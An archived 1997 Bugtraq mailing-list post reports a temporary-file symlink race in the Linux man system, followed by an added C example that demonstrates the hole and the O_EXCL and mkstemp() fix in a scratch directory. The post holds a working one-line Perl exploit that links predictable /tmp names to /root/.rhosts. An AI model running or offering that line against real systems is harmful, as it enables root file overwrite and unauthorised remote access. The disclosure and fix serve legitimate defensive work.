Bugtraq mailing list archives
man problem
From: tf () PYSIK TU-MUENCHEN DE (Thomas Fischbacher)
Date: Wed, 24 Dec 1997 13:25:14 +0100
Since this is my first posting to bugtraq, please don't flame me if this is already known:

I just noticed a problem with the man system (version 2.3.10) on my Linux box:

/usr/man contains the .gz'd man pages:

(from /usr/man/man1:)
-rw-r--r-- 1 root root 1684 Sep 28 1995 cp.1.gz
-rw-r--r-- 1 root root 4063 Dec 29 1995 cpio.1.gz
-rw-r--r-- 1 root root 42 Oct 17 1996 cpp.1.gz

When I execute man, a temporary file containing the un-zipped manpage is created in /tmp. The name of the tmp-file usually is "zman<PID>aaa", e.g. "zman10849aaa".

This can be exploited with a simple symlink attack:

    perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}'

So when root executes man here and the pid of the man process falls in the range 8000-11999... you know the rest.

--
regards,                                                  (o_
Thomas Fischbacher - tf () physik tu-muenchen de          //\
                                                          V_/_
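The failure mode described in the post, next to the exclusive-create pattern that prevents it, as an added example that is not part of the original post or of the man sources. The function names and the file name zman1234aaa are constructed, and everything runs inside a private scratch directory.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern from the post: predictable name, no O_EXCL. open() follows a
   symlink already planted at that name and truncates its target. */
static int open_tmp_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: with O_CREAT|O_EXCL, open() fails with EEXIST if anything,
   even a symlink, already exists at the path; it never follows it. */
static int open_tmp_excl(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

static long size_of(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Result bits: 1 = O_EXCL refused the planted link, 2 = mkstemp() made a
   fresh file and the target was intact, 4 = naive open emptied the target. */
int run_demo(void) {
    char dir[] = "/tmp/symdemoXXXXXX", target[64], tmp[64], uniq[64];
    int fd, bits = 0;
    if (!mkdtemp(dir)) return -1;               /* constructed sandbox dir */
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(tmp, sizeof tmp, "%s/zman1234aaa", dir);   /* constructed name */
    snprintf(uniq, sizeof uniq, "%s/zmanXXXXXX", dir);
    fd = open_tmp_excl(target);                 /* stand-in for the victim file */
    if (fd < 0 || write(fd, "keep me\n", 8) != 8) return -1;
    close(fd);
    if (symlink(target, tmp) != 0) return -1;   /* pre-planted link */
    if (open_tmp_excl(tmp) < 0 && errno == EEXIST) bits |= 1;
    fd = mkstemp(uniq);                         /* random name, 0600, exclusive */
    if (fd >= 0 && size_of(target) == 8) bits |= 2;
    if (fd >= 0) close(fd);
    fd = open_tmp_naive(tmp);                   /* follows the link */
    if (fd >= 0 && size_of(target) == 0) bits |= 4;
    if (fd >= 0) close(fd);
    unlink(tmp); unlink(uniq); unlink(target); rmdir(dir);
    return bits;
}

int main(void) { printf("result bits: %d\n", run_demo()); return 0; }
```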